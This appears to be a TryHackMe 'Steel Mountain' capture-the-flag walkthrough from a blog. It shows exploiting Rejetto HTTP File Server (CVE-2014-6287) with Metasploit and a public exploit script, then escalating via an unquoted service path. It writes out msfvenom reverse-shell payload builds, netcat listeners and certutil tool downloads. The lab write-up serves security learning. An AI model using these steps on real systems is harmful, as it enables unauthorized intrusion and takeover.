The Dutch Hacker
steel mountain tryhackme

Steel Mountain on Tryhackme

This is the write up for the room steel mountain on Tryhackme and it is part of the complete beginners path

Make a connection with VPN or use the attack box on Tryhackme site to connect to the Tryhackme lab environment.

Tasks Steel Mountain

Task 1

Deploy the machine attached to this room.

1.1 Who is the employee of the month?

Once the machine is started open firefox and navigate to the site. On this site, we see an image but no name. Look at the source of this page. Right mouse click and select view page source

Steel Mountain on Tryhackme

Notice the name of the image

Steel Mountain on Tryhackme
Answer: Bill Harper

Task 2

2.1 Scan the machine with nmap. What is the other port running a web server on?

Type in the following command

nmap -T4 A <MACHINE_IP>

Looking at the scans we see an other HTTP service open on port 8080

nmap scan
Answer 8080

2.2 Take a look at the other web server. What file server is running?

When opening the new page we found we see that it is HttpFileServer 2.3. However, this is not the answer. If you put this in google we see the correct answer

what service to exploit
Answer: Rejetto HTTP File Server

2.3 What is the CVE number to exploit this file server?

With search sploit, we found multiple options

Steel Mountain on Tryhackme

Going to https://www.exploit-db.com/ and type in the search box rejetto http file server

Steel Mountain on Tryhackme

Click on the second one and notice the number

Steel Mountain Tryhackme
Answer: 2014-6287

2.4 Use Metasploit to get an initial shell. What is the user flag?

Start Metasploit by typing

msfconsole

Now search the exploit by typing in

search 2014-6287
use 0
the exploit

Type in Options to see what we need to configure

msfconsole
set RHOST <Machine_IP>
set RPOT 8080
set LHOST tun0
run
setup msfconsole

Type in shell to get an interactive shell and navigate to the desktop of bill

Steel Mountain Tryhackme

Type in the following to output the txt file to screen

type user.txt

Task 3

Now background the shell by holding control and then press the Z button

In a new terminal, we going to download the powerUp.ps1 as stated in the task. Navigate to your download directory and type in the following command to download the script

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

back to msfconsole we type

upload ~/Downloads/PowerUp.ps1
Load powershell
powershell_shell
Steel Mountain Tryhackme
Steel Mountain Tryhackme

To run the script type in the following

. .\Powerup.ps1
Invoke-AllChecks

3.1 What is the name of the service which shows up as an unquoted service path vulnerability?

Answer: AdvancedSystemCareService9
restart service

3.2 What is the root flag?

In a new terminal type in the following command to create a .exe file that will call back to your kali machine once loaded

msfvenom -p windows/shell_reverse_tcp LHOST=10.9.135.33 LPORT=4443 -e x86/shikata_ga_nai -f exe -o Advanced.exe

As the service is not quoted we can put this file in the following directory. We also have to write access to this directory and we can restart the service. So the exploit should work. I also notice we can replace the service exe file that is already in there as we have write access to that as well. For now we just to the unquoted path

C:\Program Files (x86)\IObit\

In the meterpreter screen type in the following

cd 'C:\Program Files (x86)\IObit\'
dir
unquoted Steel Mountain Tryhackme
upload ~/Downloads/Advanced.exe
Steel Mountain Tryhackme

Now we need a listener on the port we defined when creating the exe file

type in a new terminal the following command

nc -nlvp 4443

Now go back the Metterpreter shell and type in

shell
sc stop AdvancedSystemCareService9
sc start AdvancedSystemCareService9

Steel Mountain Tryhackme

You can find the root.txt in c:\users\administrator\desktop\

Task 4

Close all screens as we will start all over again to do this without Metasploit. We will still use the advanced.exe we created later

Terminate the machine and start it again. This is very important otherwise you will not get a shell

I will put all files into my ~/Downloads/Share directory. I suggest you do the same

Download the python file here Rejetto HTTP File Server (HFS) 2.3.x – Remote Command Execution (2) – Windows remote Exploit (exploit-db.com) ( Under Exploit )

nano 39161.py
change the IP adress to your machine and port to a free port like 4444, save and close 
the exploit

Download the PowerShell PowerUp file into the same directory

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

Create or copy a new Advanced.exe

msfvenom -p windows/shell_reverse_tcp LHOST=10.9.135.33 LPORT=4443 -e x86/shikata_ga_nai -f exe -o Advanced.exe

Download the ncat.exe file and rename it to nc.exe or if running on kali copy it from your system

cp /usr/share/windows-resources/binaries/nc.exe ~/Downloads/share/nc.exe
wget https://github.com/andrew-d/static-binaries/blob/0be803093b7d4b627b4d4eddd732e54ac4184b67/binaries/windows/x86/ncat.exe

Download WinPease

wget https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/a17f91745cafc5fa43a428d766294190c0ff70a1/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe

You should have these file into your Downloads/share directory

the files needed to exploit this

Now let’s start the exploit

In the current share directory, we will start an HTTP server as the exploit needs the nc.exe file. type in the following command

python3 -m http.server 80

In a new terminal start the listener

nc -nlvp 4444

Now start the exploit by typing

python 39161.py <MACHINE_IP> 8080
Steel Mountain Tryhackme

We can download files over http with the certutil

Navigate to c:\Users\bill\desktop and download the winpeas file

certutil.exe -urlcache -split -f http://Yourmachine_ip/winPEASx86.exe

Steel Mountain Tryhackme

You can run winpeas to see it will find the unquoted service as well or do the exploit we did before. Just download the advanced.exe to the correct directory. start a listener. stop en start the service and a shell will pop

4.1 What PowerShell -c command could we run to manually find out the service name?

Answer powershell -c get-service

Most Popular Post

Sign Up

Signup today for free and be the first to get notified on new updates.
* indicates required

Follow Me

Most Popular Post

Contact Us